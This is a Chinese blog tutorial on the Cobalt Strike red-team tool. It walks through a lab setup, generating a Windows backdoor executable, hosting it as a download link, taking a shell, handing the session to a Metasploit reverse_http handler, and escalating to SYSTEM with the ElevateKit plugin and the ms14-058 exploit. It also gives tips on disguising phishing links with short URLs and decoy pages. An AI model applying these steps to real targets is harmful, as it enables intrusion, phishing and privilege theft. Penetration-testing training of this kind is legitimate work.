Cobalt Strike渗透神器详解

前言

由于最近忙着考试复习和学习 (不排除偷懒水分😂)，发现也是挺长时间没有好好更新文章了，思考了一晚上发现自律方面还有很大的进步空间啊，这边也是赶紧加班更新了一篇CS的使用呢，那就一起来学习一下叭😁；

简介

• CS是一个常用的渗透测试工具，全称为"Cobalt Strike"，它是一款针对渗透测试和红队操作而设计的工具，主要用于模拟攻击和检测网络安全漏洞，常被业界人称为CS神器；Cobalt Strike已经不再使用MSF而是作为单独的平台使用，它分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作；

功能使用

多功能性：CS提供了多种功能，包括端口扫描、漏洞扫描、远程控制、数据收集、密码破解等；
多平台支持：CS能够在多种操作系统上运行，包括Windows、Linux、Mac OS等；
多种协议支持：CS支持多种协议，包括TCP、UDP、HTTP、HTTPS、DNS等；
高度可定制化：CS的用户界面可以自定义，用户可以根据自己的需求来设置不同的选项和功能；
高度隐蔽性：CS能够伪装成各种流量，让攻击者很难被检测到；

下载与安装

• 下载CS工具并将CS上传至kali机并进行解压；

• 进入CS工具目录，简单介绍下大致的文件作用；

c2lint: 用于检查profile的错误异常
teamserver: 服务端程序
cobaltstrike,cobaltstrike.jar: 客户端程序(java跨平台)
logs: 目录记录与目标主机的相关信息
update,update.jar: 用于更新CS
third-party: 第三方工具
最核心的就是teamserver和cobaltstrike.jar: 分别是服务端和客户端

基础使用

• 启动服务端；

#赋予服务器权限
chmod 777 teamserver
#启动cs服务器
./teamserver 服务端IP 密码

• kali执行命令，启动客户端，记得也要先赋予权限才可执行；(注：这里有个小坑，不知道有木有中招的小伙伴，使用kali的终端执行该命令才可打开控制台，而通过SSH连接的终端连接不上)

• 点击后会弹出一个服务指纹信息，点击是即可，成功连接上CS；

CS如何成功上线

所需环境

攻击机（kali）
目标靶机（win 10）

添加监听

• 来到监听器位置Cobalt Strike —> Listeners；

• 点击下面的Listeners页面，接着添加Add配置信息；

生成后门木马

• 选择生成攻击后门文件Attacks —> Packages —> Windows Executable；

• 将生成的木马文件保存到一个文件夹下；

钓鱼链接

• 来到攻击模块Attacks —> Web drive-by —> Host file；

• 复制生成的链接；（注：小提一嘴，一般情况下直接发送链接很容易被识破，我们可以使用短链接生成器生成一个短链接，接着配合一些图片或页面，这样可以大大提高命中率，由于只是测试这里就不演示了哟，也是提供一个思路或方法）

• 将该恶意链接发送至目标靶机，当靶机用户访问时即会下载该木马文件；（注：需要关闭防火墙，杀毒软件等）

成功拿到shell

• 假设靶机用户比较好奇，无意中点击执行了该恶意文件，返回到CS中可以看到目标已成功上线；

• 拿到shell该怎么执行命令呢？别急别急，这就来了；

#查看IP信息
shell ipconfig
#查看用户
net user

• 执行desktop命令，还可看到靶机用户桌面实时情况；

CS如何联动MSF

所需环境

攻击机（kali）
目标靶机（win 10）

前提条件

• 必须确保目标靶机已成功上线，这里就不一一演示了哟；

MSF配置监听模块

• kali打开msfconsole；

• 设置模块，配置payload信息并执行攻击；

#使用监听模块
use exploit/multi/handler
#配置payload
set payload windows/meterpreter/reverse_http
#配置IP和端口
set lhost kali-ip
set lport 端口
#开始攻击
run/exploit

CS新建监听器

• 在CS中新建一个监听器；

• 配置一下基础的信息，值得注意的是IP和端口必须和msf监听的一致；

成功交互

• 右击后点击Interact进入命令模式；

• 接着点击Spawn添加，选择刚配置的监听payload；

• 等待命令执行完即可；

• 返回msf发现监听成功，成功进行交互；

CS如何进行提权操作

所需环境

攻击机（kali）
目标靶机（win 2008 R2）

前提条件

• 还是必须确保目标靶机已成功上线哟；

查看用户权限

• 打开视图命令，发现上线用户为普通用户；

• 打开命令模式，执行getuid命令获取用户ID，有点慢稍等一会儿；

下载提权插件

• CS里面含有自动化的提权，来到提权模块；

• 默认提权的exp就只要下面这两个，肯定是不够的，所以得去加载一些提权的插件；

• 下载ElevateKit提权插件；

• 由于CS是在kali上，将该插件上传至kali以进行操作；

加载插件

• 接下来加载插件，选择脚本管理模块；

• 选择上传的插件，点击打开；

• 打印出插件路径说明上传成功了；

• 再次打开提权模块，发现EXP果然更多了；

成功提权

• 选择好监听的目标和ms14-058EXP后，开始提权；(注：不同的靶机需要用到的提权exp是不一样的，这里的靶机环境为win 2008 R2)
• 过程也是会比较慢的，等待一会后成功提权至system权限；

• 进入命令模式，执行getuid命令查看当前用户成功提升至system权限；

还有一些其他的提权插件也还不错的，有兴趣可以下载试试；

https://github.com/DeEpinGh0st/Erebus

以上内容就是Cobalt Strike渗透神器的详细使用过程，当然还有很多其他的用法，后续也会慢慢更新喔，如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟，如有写的不好的地方也请大家多多包涵一下，我也会慢慢去改进和提高的，请各位小伙伴多多支持，走之前别忘了点个赞哟😁！

CS小福利

关注微信公众号Joker零安全回复CS另附上工具精美礼品一份哟~

免责声明由于传播、利用本博客或微信公众号所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，Joker零安全及博客作者不为此承担任何责任，一旦造成后果请自行承担！